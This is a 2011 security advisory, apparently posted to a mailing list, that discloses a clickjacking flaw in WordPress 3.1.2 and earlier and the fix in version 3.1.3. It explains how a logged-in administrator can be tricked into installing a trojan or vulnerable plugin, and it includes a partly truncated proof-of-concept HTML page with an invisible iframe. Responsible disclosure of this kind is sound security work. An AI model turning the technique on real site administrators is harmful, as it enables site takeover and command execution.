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Message-ID: <>
Date: Thu, 22 Sep 2011 15:47:40 +1200
From: Andrew Horton <>
To: <>
Subject: WordPress <=v3.1.2 Clickjacking Vulnerability

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WordPress Clickjacking Vulnerability Advisory

Product Name		WordPress
Vendor Website
Date Released		September 20th, 2011
Affected Software	WordPress version 3.1.2 and earlier
Researcher		Andrew Horton aka urbanadventurer

| Description |

This advisory is the result of research into how clickjacking can be
leveraged and is the first published clickjacking exploit against a
popular web application to gain OS command execution. WordPress is a web
application used to create a website or blog. The WordPress Admin panel
can be clickjacked to install an arbitrary plugin from the WordPress
plugin archive which leads to arbitrary PHP code installation and
subsequently OS command execution.

Versions of WordPress prior to 3.1.3 are vulnerable to clickjacking.
WordPress has had clickjacking protection since May, 2011 with the
release of version 3.1.3, however no specific threat or exploit has been

Clickjacking is an attack that places an invisible iframe containing a
webpage over top of another, visible webpage. The victim user is lured
into clicking on the invisible iframe to perform an action when they
think they are clicking on the webpage they can see. The iframe on top
is made invisible using the CSS Opacity property, it is placed above
other elements on the webpage by using the CSS Z-Index property, and it
is lined up with the webpage underneath using CSS absolute positioning.

The WordPress Administration panel has an Install Plugin webpage with an
Install Now button that can be clickjacked to install an arbitrary
WordPress plugin from the WordPress plugin archive.

WordPress plugins are ZIP archives with no special requirements.
Installation of a plugin involves unpacking the ZIP archive into the
following folder under the webroot, accessible at the following URL.

WordPress Plugin Installation Location

| Exploitation |

The ability to install an arbitrary plugin through clickjacking can be
exploited through two methods, one is to submit a trojan horse plugin to
the WordPress plugin archive, the second method is to install a
vulnerable plugin and to subsequently exploit it’s weakness.

The following URL opens the WordPress Plugin Installation web page for
an arbitrary plugin specified in the plugin parameter.

WordPress Clickjacking Exploit Page

The following proof of concept web page will place an invisible Install
Now button over a read more link. When clicked by a WordPress
administrator, it will install the wp-gallery-remote plugin.

Exploitation involves luring a WordPress administrator, who is currently
logged into the WordPress website, into visiting a malicious webpage
which contains an Install Plugin webpage within an invisible iframe.
The administrator user’s session cookies will be automatically sent to
the WordPress administration panel by the browser. Next the
administrator needs to click on the Install Now button without realizing
the button has been clicked. This causes PHP script content to be
installed in the WordPress website.

WordPress Clickjacking Proof Of Concept
WordPress Example Exploit #1
WordPress versions 3.1.2 and lower are vulnerable.
by Andrew Horton aka urbanadventurer from
<head><title>Clickjack Exploit for WordPress v1</title></head>
#outerdiv {
width:100px; height:30px; overflow:hidden;
z-index:10; opacity:0;
position:absolute; top:135px; left:445px;

#inneriframe {
position:absolute; top:-40px; left:-10px; width:200px; height:100px;
border: none;
#para { width:650px; }
.clickjack { width:100px; height:30px; position:absolute; top:145px;
left:450px; }

<h1>WordPress Clickjack Exploit v1</h1>

<p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit,
sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut
enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi.</p>
<div class='clickjack'><a href='#'>read more</a></div>

<div id="outerdiv" >
<iframe id="inneriframe" scrolling="no"

<p id="para" style="margin-top:50px;">
An Install Now button is hidden in front of the 'read more' link. When
clicked, this will install a WordPress plugin.
After installation, the user is redirected to a page acknowledging the
new plugin.</p>

<p>The hidden iframe contains : <a


This proof of concept page demonstrates the vulnerability but it is not
subtle. It discloses that a plugin has just been installed by
redirecting to a new webpage.

| More Information |

For more information including a realistic exploit demonstration see the
presentation Clickjacking for Shells available at

Download the proof of concept exploit from:

| Solution |

WordPress resolved this issue with foresight in WordPress version 3.1.3,
released in May 2011, by introducing clickjacking protection for the
WordPress admin panel. At the time there was no published clickjacking
threat to WordPress.

More details are available in the WordPress 3.1.3 release notes

| About |
+-------------------------------+ is Australasia’s leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout the Asia Pacific region. Our
clients include some of the largest globally recognised companies in
areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and a
high level of technical expertise while creating long and lasting
professional relationships with our clients. is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.


Andrew Horton
Security Consultant
Mobile: +64 272 646 959
Office: +64 4 470 1658


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